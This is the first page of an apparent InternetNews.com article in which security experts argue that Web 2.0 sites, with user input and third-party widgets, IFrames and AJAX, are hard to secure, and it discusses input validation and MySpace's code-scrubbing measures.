RealTime IT News

Web 2.0: Unsafe At Any Speed?

Paul Ferguson, a network architect with antivirus vendor Trend Micro, summed up Web 2.0 as thus: "We're basically training our online users to be exploited."

He's not the only security expert who feels this way. Researchers who live and breathe malware told InternetNews.com in multiple interviews that the very nature of Web 2.0 technology and how it is used begs for malicious software infection and is virtually impossible to secure.

The laundry list of complaints about Web 2.0 security can be boiled down to two distinct problems: not knowing all of your data sources, and having no control over what may be served up.

"Web 2.0 sites are defined by user collaboration and user input. So whenever you have input from a user that can show up on a Web page to other people, that creates a form of risk," said Jon Orbeton, strategic product manager for IronPort, a developer of gateway filtering hardware.

Bob Buffone, chief architect with Nexaweb, a provider of Web 2.0-based applications for the enterprise, agrees. "From the end user's perspective, this third party code inclusion – IFrame , widgets, AJAX  -- really breaks the trust relationship with a Web site and end user," he said. "The user comes to a site trusting that the site has done everything to secure their data. They don't know what extends beyond that."

End users can't protect themselves because they can't see from the Web page they are on from where all of this stuff is being pulled. A well-programmed site checks the integrity of the data taken from an outside source before it's sent down to the user. Programmers call that process input validation.

If something from the outside is brought into an application, it needs to be scrubbed for dangerous code. But all too often, data and code are just grabbed from a variety of sources without the user really looking to see if it contains any malicious code. It's even hard to trust trusted sites is not safe any more. [cob:Related_Articles]

It's the nature of the Web 2.0 beast to bring in data from other sources, which is what makes it fun and at the same time dangerous. "What makes it more dangerous is collaboration. There's so much more data being exposed these days. With GeoCities a decade ago, it was pretty unscriptable. There wasn't much the bad guys could do to harvest information and there was little people put out there," said Randy Abrams, director of technical training for antivirus vendor ESET Software.

"GeoCities was like a bunch of apartments, whereas MySpace is like Time Square, except people are hanging up their dirty laundry and changing in public," he added.

Fortunately, some of the Web 2.0 leaders are beginning to recognize this. When it launched a developer platform earlier this month, MySpace was quite careful to put in many of the security measures that security experts say are needed. This includes code scrubbing and means to prevent code injection.

Next page: Do they really code safely?